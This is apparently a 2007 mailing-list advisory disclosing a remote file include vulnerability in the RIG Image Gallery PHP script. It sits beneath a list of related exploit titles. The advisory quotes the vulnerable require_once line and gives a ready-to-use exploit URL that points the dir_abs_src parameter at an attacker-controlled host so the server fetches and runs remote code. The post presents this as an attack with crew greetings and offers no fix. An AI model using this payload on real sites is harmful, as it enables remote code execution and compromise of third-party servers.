Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

BellaBook Admin Bypass/Remote Code Execution

BellaBiblio Admin Login Bypass

RFI ====> vBulletin v3.6.5

Dora Emlak Script v1.0 (tr) Admin Login ByPass

From:	ilkerKandemir_(at)_mynet.com <ilkerKandemir_(at)_mynet.com>
Date:	31.07.2007
Subject:	RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability

---------------------------------------------------------------------------------
----------------------------------

MEFISTO PreSents...


Script: RIG Image Gallery
Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once(rig_check_src_file($dir_abs_src . "entry_point.php"));

---------------------------------------------------------------------------------
----------------------------------

Exploit:  check_entry.php?dir_abs_src=http://attacker.php?

---------------------------------------------------------------------------------
----------------------------------

Tnx:H0tturk,Ajann,Dumenci,Str0ke